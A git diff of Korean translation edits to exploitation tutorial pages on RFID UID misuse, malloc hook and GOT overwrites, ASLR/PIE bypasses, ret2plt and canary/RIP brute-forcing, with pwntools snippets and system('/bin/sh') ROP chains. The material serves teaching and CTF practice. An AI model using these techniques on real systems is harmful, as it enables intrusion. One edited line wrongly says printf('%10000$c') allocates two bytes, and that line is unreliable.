-UID에 의존하여 **인증 및 접근 권한 부여**를 수행하는 많은 출입 통제 시스템이 있습니다. 때때로 RFID 태그가 **암호화를 지원**할 때도 **이런 오용**이 발생합니다. 이러한 오용은 보안 측면에서 **125 kHz 카드** 수준으로 떨어뜨립니다. 가상 카드(예: Apple Pay)는 동적 UID를 사용하여 전화 소유자가 결제 앱으로 문을 열지 않도록 합니다.
+UID에 의존하여 **인증 및 접근 권한 부여**를 수행하는 많은 출입 통제 시스템이 있습니다. 때때로 RFID 태그가 **암호화를 지원**할 때도 이러한 일이 발생합니다. 이러한 **오용**은 보안 측면에서 **125 kHz 카드** 수준으로 떨어뜨립니다. 가상 카드(예: Apple Pay)는 동적 UID를 사용하여 전화 소유자가 결제 앱으로 문을 열지 않도록 합니다.
 
 - **짧은 범위** — 고주파 카드는 판독기에 가까이 배치되어야 하도록 특별히 설계되었습니다. 이는 카드가 무단 상호작용으로부터 보호되는 데도 도움이 됩니다. 우리가 달성한 최대 읽기 범위는 약 15cm였으며, 이는 맞춤형 고범위 판독기를 사용했을 때입니다.
-- **고급 프로토콜** — 데이터 전송 속도가 최대 424 kbps로 복잡한 프로토콜과 완전한 양방향 데이터 전송을 가능하게 합니다. 이는 **암호화**, 데이터 전송 등을 허용합니다.
+- **고급 프로토콜** — 데이터 전송 속도가 424 kbps에 달하여 복잡한 프로토콜과 완전한 양방향 데이터 전송을 가능하게 합니다. 이는 **암호화**, 데이터 전송 등을 허용합니다.
 - **높은 보안** — 고주파 비접촉 카드가 스마트 카드에 비해 열등하지 않습니다. AES와 같은 암호적으로 강력한 알고리즘을 지원하고 비대칭 암호화를 구현하는 카드도 있습니다.
 
 ### Attack
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
index 1520b5fd3..59a1990e4 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
@@ -4,9 +4,9 @@
 
 ## **Malloc Hook**
 
-공식 GNU 사이트에 따르면, 변수 **`__malloc_hook`**는 **`malloc()`가 호출될 때마다 호출될 함수의 주소를 가리키는 포인터**로, **libc 라이브러리의 데이터 섹션에 저장됩니다**. 따라서 이 주소가 예를 들어 **One Gadget**으로 덮어쓰여지면 `malloc`이 호출될 때 **One Gadget이 호출됩니다**.
+공식 GNU 사이트에 따르면, 변수 **`__malloc_hook`**는 `malloc()`이 호출될 때마다 호출될 **함수의 주소를 가리키는 포인터**로, **libc 라이브러리의 데이터 섹션에 저장됩니다**. 따라서 이 주소가 예를 들어 **One Gadget**으로 덮어쓰여지면 `malloc`이 호출될 때 **One Gadget이 호출됩니다**.
 
-`malloc`을 호출하기 위해 프로그램이 이를 호출할 때까지 기다리거나 **`printf("%10000$c")`**를 호출하여 너무 많은 바이트를 할당하여 `libc`가 힙에 할당하도록 할 수 있습니다.
+`malloc`을 호출하기 위해 프로그램이 이를 호출할 때까지 기다리거나 **`printf("%10000$c")`**를 호출하여 두 바이트를 할당하여 `libc`가 힙에 할당하도록 할 수 있습니다.
 
 One Gadget에 대한 더 많은 정보는 다음에서 확인할 수 있습니다:
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
index aaec669e3..a51b7631c 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
@@ -36,9 +36,9 @@ GEF를 사용하여 **디버깅** 세션을 **시작**하고 **`got`**을 실행
 
 바이너리에서 GOT는 **함수의 주소** 또는 **PLT** 섹션의 주소를 가지고 있습니다. 이 임의 쓰기의 목표는 **나중에 실행될 함수의 GOT 항목을** **`system`** **함수의 PLT 주소**로 **덮어쓰는** 것입니다.
 
-이상적으로는, **당신이 제어하는 매개변수로 호출될 함수의 GOT를 덮어써야** 합니다 (그래야 시스템 함수에 전달되는 매개변수를 제어할 수 있습니다).
+이상적으로는, **당신이 제어하는 매개변수로 호출될 함수의 GOT를 덮어써야 합니다** (그래야 시스템 함수에 전달되는 매개변수를 제어할 수 있습니다).
 
-**`system`** **이 스크립트에서 사용되지 않는 경우**, 시스템 함수는 PLT에 항목이 **없습니다**. 이 시나리오에서는 먼저 `system` 함수의 주소를 **유출**한 다음 GOT를 덮어써서 이 주소를 가리키게 해야 합니다.
+**`system`** **이 스크립트에서 사용되지 않는 경우**, 시스템 함수는 PLT에 항목이 **없습니다**. 이 시나리오에서는 먼저 `system` 함수의 주소를 **유출**한 다음 GOT를 이 주소를 가리키도록 덮어써야 합니다.
 
 PLT 주소는 **`objdump -j .plt -d ./vuln_binary`**로 확인할 수 있습니다.
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
index 0ef0345a8..833a39e50 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
@@ -15,14 +15,14 @@
 objdump -s -j .dtors /exec
 rabin -s /exec | grep “__DTOR”
 ```
-보통 **DTOR** 마커는 `ffffffff`과 `00000000` 값 사이에 있습니다. 따라서 이 값들만 보인다면 **등록된 함수가 없다는** 의미입니다. 그러므로 **`00000000`**을 **실행할 셸코드의 주소**로 **덮어씌우세요**.
+보통 **DTOR** 마커는 `ffffffff`과 `00000000` 값 사이에 있습니다. 따라서 이러한 값을 보면 **등록된 함수가 없다는** 의미입니다. 그러므로 **`00000000`**을 **실행할 shellcode의 주소**로 **덮어씌우세요**.
 
 > [!WARNING]
-> 물론, 먼저 **셸코드를 저장할 장소를 찾아야** 나중에 호출할 수 있습니다.
+> 물론, 먼저 **shellcode를 저장할 장소**를 찾아야 나중에 호출할 수 있습니다.
 
 ## **.fini_array**
 
-본질적으로 이것은 프로그램이 종료되기 전에 **호출될 함수들**로 구성된 구조체입니다. 이는 **`.dtors`**와 유사합니다. 주소로 점프하여 **셸코드를 호출**할 수 있거나, **취약점을 두 번째로 악용하기 위해 다시 `main`으로 돌아가야** 하는 경우에 흥미롭습니다.
+본질적으로 이것은 프로그램이 종료되기 전에 호출될 **함수들**로 구성된 구조체입니다. 이는 **`.dtors`**와 유사합니다. 주소로 점프하여 **shellcode를 호출**할 수 있거나, **취약점을 두 번째로 악용하기 위해 다시 `main`으로 돌아가야 하는** 경우에 흥미롭습니다.
 ```bash
 objdump -s -j .fini_array ./greeting
 
@@ -33,9 +33,9 @@ Contents of section .fini_array:
 
 #Put your address in 0x8049934
 ```
-이 **영원한 루프**를 **생성하지** 않을 것임에 유의하세요. 왜냐하면 main으로 돌아갈 때 canary가 이를 감지하고, 스택의 끝이 손상될 수 있으며, 함수가 다시 호출되지 않기 때문입니다. 따라서 이를 통해 **1회 더 실행**할 수 있습니다.
+다음 사항에 유의하세요. 이 **영원한 루프**를 **생성하지** 않을 것입니다. 왜냐하면 메인으로 돌아갈 때 카나리가 이를 감지하고, 스택의 끝이 손상될 수 있으며, 함수가 다시 호출되지 않기 때문입니다. 따라서 이를 통해 **1회의 추가 실행**을 할 수 있습니다.
 
 > [!CAUTION]
-> [Full RELRO](../common-binary-protections-and-bypasses/relro.md)와 함께 `.fini_array` 섹션이 **읽기 전용**으로 설정된다는 점에 유의하세요.
+> [Full RELRO](../common-binary-protections-and-bypasses/relro.md)와 함께 `.fini_array` 섹션이 **읽기 전용**으로 설정됩니다.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
index a828dd282..62b643ed1 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
@@ -24,6 +24,6 @@ ulimit -c unlimited
 ```bash
 gdb /path/to/executable /path/to/core_file
 ```
-이 명령은 실행 파일과 코어 파일을 GDB에 로드하여 충돌 시 프로그램의 상태를 검사할 수 있게 합니다. GDB 명령을 사용하여 스택을 탐색하고, 변수를 검사하며, 충돌의 원인을 이해할 수 있습니다.
+이 명령은 실행 파일과 코어 파일을 GDB에 로드하여 충돌 시 프로그램의 상태를 검사할 수 있게 해줍니다. GDB 명령을 사용하여 스택을 탐색하고, 변수를 검사하며, 충돌의 원인을 이해할 수 있습니다.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
index 612cda080..8176c4db7 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
@@ -11,7 +11,7 @@
 Linux 시스템에서 ASLR 상태를 **확인**하려면 `/proc/sys/kernel/randomize_va_space` 파일에서 값을 읽을 수 있습니다. 이 파일에 저장된 값은 적용되는 ASLR의 유형을 결정합니다:
 
 - **0**: 무작위화 없음. 모든 것이 정적입니다.
-- **1**: 보수적 무작위화. 공유 라이브러리, 스택, mmap(), VDSO 페이지가 무작위화됩니다.
+- **1**: 보수적인 무작위화. 공유 라이브러리, 스택, mmap(), VDSO 페이지가 무작위화됩니다.
 - **2**: 완전 무작위화. 보수적 무작위화에 의해 무작위화된 요소 외에도 `brk()`를 통해 관리되는 메모리가 무작위화됩니다.
 
 다음 명령어로 ASLR 상태를 확인할 수 있습니다:
@@ -37,7 +37,7 @@ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
 ```
 ### **재부팅 간 지속성**
 
-`echo` 명령어로 만든 변경 사항은 일시적이며 재부팅 시 초기화됩니다. 변경 사항을 지속적으로 유지하려면 `/etc/sysctl.conf` 파일을 편집하고 다음 줄을 추가하거나 수정해야 합니다:
+`echo` 명령어로 변경한 내용은 일시적이며 재부팅 시 초기화됩니다. 변경 사항을 지속적으로 유지하려면 `/etc/sysctl.conf` 파일을 편집하고 다음 줄을 추가하거나 수정해야 합니다:
 ```tsconfig
 kernel.randomize_va_space=2 # Enable ASLR
 # or
@@ -55,9 +55,9 @@ sudo sysctl -p
 
 PaX는 프로세스 주소 공간을 **3 그룹**으로 나눕니다:
 
-- **코드 및 데이터** (초기화된 및 초기화되지 않은): `.text`, `.data`, 및 `.bss` —> `delta_exec` 변수에서 **16 비트**의 엔트로피. 이 변수는 각 프로세스와 함께 무작위로 초기화되며 초기 주소에 추가됩니다.
-- `mmap()`에 의해 할당된 **메모리** 및 **공유 라이브러리** —> **16 비트**, `delta_mmap`이라고 불립니다.
-- **스택** —> **24 비트**, `delta_stack`이라고 합니다. 그러나 실제로는 **11 비트**를 사용합니다 (10번째 바이트부터 20번째 바이트까지 포함), **16 바이트**에 정렬됩니다 —> 이로 인해 **524,288개의 가능한 실제 스택 주소**가 생성됩니다.
+- **코드 및 데이터** (초기화된 및 초기화되지 않은): `.text`, `.data`, 및 `.bss` —> `delta_exec` 변수에서 **16비트**의 엔트로피. 이 변수는 각 프로세스와 함께 무작위로 초기화되며 초기 주소에 추가됩니다.
+- `mmap()`에 의해 할당된 **메모리** 및 **공유 라이브러리** —> **16비트**, `delta_mmap`이라고 불립니다.
+- **스택** —> **24비트**, `delta_stack`이라고 합니다. 그러나 실제로는 **11비트**를 사용합니다 (10번째 바이트부터 20번째 바이트까지 포함), **16바이트**에 정렬됩니다 —> 이로 인해 **524,288개의 가능한 실제 스택 주소**가 생성됩니다.
 
 이전 데이터는 32비트 시스템에 대한 것이며, 최종 엔트로피가 감소하여 ASLR을 우회할 수 있도록 실행을 반복하여 익스플로잇이 성공적으로 완료될 때까지 시도할 수 있습니다.
 
@@ -69,10 +69,10 @@ PaX는 프로세스 주소 공간을 **3 그룹**으로 나눕니다:
 ```python
 for off in range(0xb7000000, 0xb8000000, 0x1000):
 ```
-- 원격 서버를 공격하는 경우, **`libc` 함수 `usleep`의 주소를 무작위로 추측해 볼 수 있습니다**, 예를 들어 인수로 10을 전달합니다. 만약 어느 시점에서 **서버가 응답하는 데 10초가 추가로 걸린다면**, 이 함수의 주소를 찾은 것입니다.
+- 원격 서버를 공격하는 경우, **`libc` 함수 `usleep`의 주소를 브루트 포스 시도**할 수 있으며, 인수로 10을 전달합니다(예:). 어떤 시점에서 **서버가 응답하는 데 10초가 추가로 걸린다면**, 이 함수의 주소를 찾은 것입니다.
 
 > [!TIP]
-> 64비트 시스템에서는 엔트로피가 훨씬 높아 이 방법은 불가능합니다.
+> 64비트 시스템에서는 엔트로피가 훨씬 높아 이 방법이 불가능합니다.
 
 ### 로컬 정보 (`/proc/[pid]/stat`)
 
@@ -85,7 +85,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
 - **arg_start** & **arg_end**: **cli arguments** 위와 아래의 주소
 - **env_start** & **env_end**: **env variables** 위와 아래의 주소
 
-따라서 공격자가 악용되는 바이너리와 동일한 컴퓨터에 있고 이 바이너리가 원시 인수로부터의 오버플로우를 예상하지 않는 경우, 그러나 이 파일을 읽은 후 조작할 수 있는 다른 **입력으로부터** 오버플로우를 예상하는 경우, 공격자는 **이 파일에서 일부 주소를 가져와 이를 기반으로 오프셋을 구성하여 익스플로잇을 수행할 수 있습니다**.
+따라서 공격자가 익스플로잇되는 바이너리와 동일한 컴퓨터에 있고 이 바이너리가 원시 인수에서 오버플로우를 예상하지 않지만, 이 파일을 읽은 후 조작할 수 있는 다른 **입력에서 오버플로우를 예상하는 경우** 공격자는 **이 파일에서 일부 주소를 가져와서 익스플로잇을 위한 오프셋을 구성할 수 있습니다**.
 
 > [!TIP]
 > 이 파일에 대한 자세한 정보는 [https://man7.org/linux/man-pages/man5/proc.5.html](https://man7.org/linux/man-pages/man5/proc.5.html)에서 `/proc/pid/stat`를 검색하여 확인하세요.
@@ -94,7 +94,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
 
 - **도전 과제는 누수를 제공하는 것입니다**
 
-누수를 제공받으면 (쉬운 CTF 도전 과제), 이를 기반으로 오프셋을 계산할 수 있습니다 (예를 들어, 공격하는 시스템에서 사용되는 정확한 libc 버전을 알고 있다고 가정할 때). 이 예제 익스플로잇은 [**여기에서의 예제**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak)에서 발췌한 것입니다 (자세한 내용은 해당 페이지를 확인하세요):
+누수를 제공받으면(쉬운 CTF 도전 과제), 이를 통해 오프셋을 계산할 수 있습니다(예를 들어, 익스플로잇하는 시스템에서 사용되는 정확한 libc 버전을 알고 있다고 가정). 이 예제 익스플로잇은 [**여기에서의 예제**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak)에서 발췌한 것입니다(자세한 내용은 해당 페이지를 확인하세요):
 ```python
 from pwn import *
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
index 69061e8f4..252bc74d4 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
@@ -6,7 +6,7 @@
 
 이 기술의 목표는 **ASLR을 우회하기 위해 PLT의 함수에서 주소를 누출하는 것**입니다. 예를 들어, libc의 `puts` 함수의 주소를 누출하면, **`libc`의 기본 주소를 계산하고** 다른 함수에 접근하기 위한 오프셋을 계산할 수 있습니다. 
 
-이는 `pwntools` 페이로드를 사용하여 수행할 수 있습니다 ([**여기에서**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)):
+이는 ([**여기서**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got))와 같은 `pwntools` 페이로드로 수행할 수 있습니다:
 ```python
 # 32-bit ret2plt
 payload = flat(
@@ -27,10 +27,10 @@ elf.symbols['main']
 ```
 **`puts`** (PLT의 주소를 사용하여)가 GOT(전역 오프셋 테이블)에 위치한 `puts`의 주소로 호출되는 방식을 주목하십시오. 이는 `puts`가 `puts`의 GOT 항목을 출력할 때, 이 **항목이 메모리에서 `puts`의 정확한 주소를 포함하게 되기 때문입니다**.
 
-또한 `main`의 주소가 익스플로잇에서 사용되므로 `puts`가 실행을 종료할 때, **바이너리가 종료하는 대신 `main`을 다시 호출합니다** (따라서 유출된 주소는 계속 유효합니다).
+또한 `main`의 주소가 익스플로잇에서 사용되므로 `puts`가 실행을 마치면 **바이너리가 종료되는 대신 `main`을 다시 호출합니다** (따라서 누출된 주소는 계속 유효합니다).
 
 > [!CAUTION]
-> 이것이 작동하기 위해서는 **바이너리가 PIE로 컴파일될 수 없거나, PLT, GOT 및 `main`의 주소를 알기 위해 PIE를 우회할 수 있는 유출을 찾아야 합니다**. 그렇지 않으면 먼저 PIE를 우회해야 합니다.
+> 이것이 작동하려면 **바이너리가 PIE로 컴파일될 수 없거나, PLT, GOT 및 `main`의 주소를 알기 위해 PIE를 우회할 수 있는 누출을 찾아야 합니다**. 그렇지 않으면 먼저 PIE를 우회해야 합니다.
 
 [**이 우회에 대한 전체 예제를 여기에서 찾을 수 있습니다**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/ret2plt-aslr-bypass). 이것은 그 예제에서의 최종 익스플로잇이었습니다:
 ```python
@@ -71,8 +71,8 @@ p.interactive()
 ## 다른 예제 및 참고자료
 
 - [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
-- 64비트, ASLR 활성화되었지만 PIE 없음, 첫 번째 단계는 canary의 바이트 0x00까지 오버플로우를 채운 다음 puts를 호출하여 이를 누출하는 것입니다. canary를 사용하여 puts의 GOT에서 주소를 누출하기 위해 puts를 호출하는 ROP 가젯이 생성되고, 그 다음 `system('/bin/sh')`를 호출하는 ROP 가젯이 생성됩니다.
+- 64비트, ASLR 활성화, 그러나 PIE 없음, 첫 번째 단계는 canary의 바이트 0x00까지 오버플로우를 채운 다음 puts를 호출하여 leak하는 것입니다. canary를 사용하여 puts의 GOT에서 주소를 leak하기 위해 puts를 호출하는 ROP gadget이 생성되고, 그 다음 `system('/bin/sh')`를 호출하는 ROP gadget이 생성됩니다.
 - [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html)
-- 64비트, ASLR 활성화, canary 없음, 자식 함수에서 main의 스택 오버플로우. puts의 GOT에서 주소를 누출하기 위해 puts를 호출하는 ROP 가젯을 호출한 다음 one gadget을 호출합니다.
+- 64비트, ASLR 활성화, canary 없음, 자식 함수에서 main의 스택 오버플로우. puts의 GOT에서 주소를 leak하기 위해 puts를 호출하는 ROP gadget을 호출한 다음 one gadget을 호출합니다.
 
 {{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md
index 7490a5668..e635d594b 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md
@@ -9,7 +9,7 @@
 ## 우회 방법
 
 - [**ROP**](../stack-overflow/rop-return-oriented-programing.md)와 같은 기술을 사용하여 이 보호 기능을 우회하고 바이너리에 이미 존재하는 실행 가능한 코드 조각을 실행할 수 있습니다.
-- [**Ret2libc**](../stack-overflow/ret2lib/)
+- [**Ret2libc**](../stack-overflow/ret2libc/)
 - [**Ret2syscall**](../stack-overflow/rop-syscall-execv.md)
 - **Ret2...**
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
index 98b46b73e..2f01b653a 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
@@ -6,24 +6,24 @@
 
 PIE로 컴파일된 바이너리는 **위치 독립 실행 파일**을 의미하며, **프로그램이 실행될 때마다 다른 메모리 위치에 로드될 수 있습니다**, 하드코딩된 주소를 방지합니다.
 
-이러한 바이너리를 악용하는 요령은 **상대 주소**를 이용하는 것입니다. 프로그램의 부분 간의 오프셋은 절대 위치가 변경되더라도 동일하게 유지됩니다. **PIE를 우회하려면 하나의 주소를 유출하기만 하면 됩니다**, 일반적으로 포맷 문자열 공격과 같은 취약점을 사용하여 **스택**에서 유출합니다. 주소를 하나 확보하면 **고정 오프셋**을 통해 다른 주소를 계산할 수 있습니다.
+이러한 바이너리를 악용하는 요령은 **상대 주소**를 이용하는 것입니다. 프로그램의 부분 간의 오프셋은 절대 위치가 변경되더라도 동일하게 유지됩니다. **PIE를 우회하려면 하나의 주소를 유출하기만 하면 됩니다**, 일반적으로 **스택**에서 포맷 문자열 공격과 같은 취약점을 사용하여. 주소를 하나 확보하면 **고정 오프셋**을 통해 다른 주소를 계산할 수 있습니다.
 
-PIE 바이너리를 악용하는 데 유용한 힌트는 그들의 **기본 주소가 일반적으로 000으로 끝난다는 것입니다**, 이는 메모리 페이지가 무작위화의 단위로 0x1000 바이트 크기이기 때문입니다. 이 정렬은 **익스플로잇이 예상대로 작동하지 않을 경우** 중요한 **확인 사항**이 될 수 있으며, 올바른 기본 주소가 식별되었는지를 나타냅니다.\
-또는 익스플로잇에 사용할 수 있습니다. 주소가 **`0x649e1024`**에 위치해 있다고 유출되면, **기본 주소는 `0x649e1000`**이라는 것을 알 수 있으며, 거기서 함수와 위치의 **오프셋을 계산**할 수 있습니다.
+PIE 바이너리를 악용하는 데 유용한 힌트는 **기본 주소가 일반적으로 000으로 끝난다는 것입니다**, 이는 메모리 페이지가 무작위화의 단위로 0x1000 바이트 크기 때문입니다. 이 정렬은 **익스플로잇이 예상대로 작동하지 않을 경우** 중요한 **확인 사항**이 될 수 있으며, 올바른 기본 주소가 식별되었는지를 나타냅니다.\
+또는 익스플로잇에 사용할 수 있습니다. 주소가 **`0x649e1024`**에 위치해 있다고 유출되면, **기본 주소는 `0x649e1000`**임을 알 수 있으며, 거기서부터 함수와 위치의 **오프셋을 계산**할 수 있습니다.
 
 ## 우회 방법
 
 PIE를 우회하려면 **로드된** 바이너리의 주소를 **유출해야** 합니다. 이를 위한 몇 가지 옵션이 있습니다:
 
 - **ASLR 비활성화**: ASLR이 비활성화되면 PIE로 컴파일된 바이너리는 항상 **같은 주소에 로드됩니다**, 따라서 **PIE는 쓸모가 없게 됩니다**. 객체의 주소는 항상 같은 위치에 있게 됩니다.
-- 유출을 **제공받기** (쉬운 CTF 챌린지에서 일반적, [**이 예시를 확인하세요**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit))
+- 유출된 주소를 **제공받기** (쉬운 CTF 챌린지에서 일반적, [**이 예시를 확인하세요**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit))
 - **스택에서 EBP와 EIP 값을 무작위로 시도**하여 올바른 값을 유출할 때까지:
 
 {{#ref}}
 bypassing-canary-and-pie.md
 {{#endref}}
 
-- [**포맷 문자열**](../../format-strings/)과 같은 임의 읽기 취약점을 사용하여 바이너리의 주소를 유출합니다 (예: 이전 기술처럼 스택에서) 바이너리의 기본 주소를 얻고 거기서 오프셋을 사용합니다. [**여기에서 예시를 찾으세요**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass).
+- [**포맷 문자열**](../../format-strings/)과 같은 임의 읽기 취약점을 사용하여 바이너리의 주소를 유출 (예: 이전 기술처럼 스택에서)하여 바이너리의 기본 주소를 얻고 거기서 오프셋을 사용할 수 있습니다. [**여기에서 예시를 찾으세요**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass).
 
 ## 참고 자료
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
index 3c3d66ed7..3a33381eb 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
@@ -7,16 +7,16 @@
 ![](<../../../../images/image (144).png>)
 
 > [!NOTE]
-> **`checksec`**가 바이너리가 canary로 보호되고 있다는 것을 찾지 못할 수 있습니다. 이는 정적으로 컴파일되었고 함수를 식별할 수 없기 때문입니다.\
-> 그러나 함수 호출의 시작 부분에서 스택에 값이 저장되고 이 값이 종료 전에 확인되는 것을 발견하면 수동으로 이를 알 수 있습니다.
+> **`checksec`**가 바이너리가 canary로 보호되고 있는지 찾지 못할 수 있습니다. 이는 정적으로 컴파일되었고 함수를 식별할 수 없기 때문입니다.\
+> 그러나 함수 호출 시작 시 스택에 값이 저장되고 이 값이 종료 전에 확인되는 것을 발견하면 수동으로 이를 알 수 있습니다.
 
 ## Brute-Force Addresses
 
 PIE를 우회하기 위해서는 **주소를 유출해야** 합니다. 바이너리가 주소를 유출하지 않는 경우, 가장 좋은 방법은 **취약한 함수에서 스택에 저장된 RBP와 RIP를 브루트포스하는 것**입니다.\
-예를 들어, 바이너리가 **canary**와 **PIE**로 보호되고 있다면, canary를 브루트포스한 후 **다음** 8 바이트(x64)는 저장된 **RBP**이고 **다음** 8 바이트는 저장된 **RIP**입니다.
+예를 들어, 바이너리가 **canary**와 **PIE**로 보호되고 있다면, canary를 브루트포스한 후 **다음** 8 바이트(x64)는 저장된 **RBP**이고, **다음** 8 바이트는 저장된 **RIP**가 됩니다.
 
 > [!TIP]
-> 스택 내의 반환 주소는 주 바이너리 코드에 속한다고 가정합니다. 취약점이 바이너리 코드에 위치한다면, 일반적으로 이 경우가 될 것입니다.
+> 스택 내의 반환 주소는 메인 바이너리 코드에 속한다고 가정합니다. 취약점이 바이너리 코드에 위치한다면, 일반적으로 이 경우가 됩니다.
 
 바이너리에서 RBP와 RIP를 브루트포스하기 위해서는 프로그램이 무언가를 출력하거나 단순히 충돌하지 않으면 유효한 추측 바이트가 맞다는 것을 알 수 있습니다. canary를 브루트포스하기 위해 제공된 **동일한 함수**를 사용하여 RBP와 RIP를 브루트포스할 수 있습니다:
 ```python
@@ -66,9 +66,9 @@ print("Brute-Forcing RIP")
 base_canary_rbp_rip = get_bf(base_canary_rbp)
 RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
 ```
-PIE를 무너뜨리기 위해 필요한 마지막 것은 **유출된** 주소에서 **유용한 주소**를 계산하는 것입니다: **RBP**와 **RIP**입니다.
+PIE를 무너뜨리기 위해 필요한 마지막 단계는 **유출된** 주소에서 **유용한 주소**를 계산하는 것입니다: **RBP**와 **RIP**입니다.
 
-**RBP**를 통해 **스택에 셸을 어디에 쓰고 있는지** 계산할 수 있습니다. 이는 스택 내에서 문자열 _"/bin/sh\x00"_을 어디에 쓸 것인지 아는 데 매우 유용할 수 있습니다. 유출된 RBP와 셸코드 간의 거리를 계산하려면 **RBP를 유출한 후에 브레이크포인트를 설정**하고 **셸코드가 어디에 위치하는지** 확인한 다음, 셸코드와 RBP 간의 거리를 계산할 수 있습니다:
+**RBP**를 사용하여 **스택에 셸을 어디에 쓰고 있는지** 계산할 수 있습니다. 이는 스택 내에서 문자열 _"/bin/sh\x00"_을 어디에 쓸 것인지 아는 데 매우 유용할 수 있습니다. 유출된 RBP와 셸코드 간의 거리를 계산하려면 **RBP를 유출한 후에 중단점을 설정**하고 **셸코드가 어디에 위치하는지** 확인한 다음, 셸코드와 RBP 간의 거리를 계산할 수 있습니다:
 ```python
 INI_SHELLCODE = RBP - 1152
 ```
@@ -77,7 +77,7 @@ INI_SHELLCODE = RBP - 1152
 
 ![](<../../../../images/image (145).png>)
 
-이 예제에서는 모든 코드를 찾는 데 **1바이트 반만 필요**하다는 것을 볼 수 있으며, 이 경우 기본 주소는 **유출된 RIP에 "000"으로 끝나는** 것입니다. 예를 들어 `0x562002970ecf`가 유출되었다면 기본 주소는 `0x562002970000`입니다.
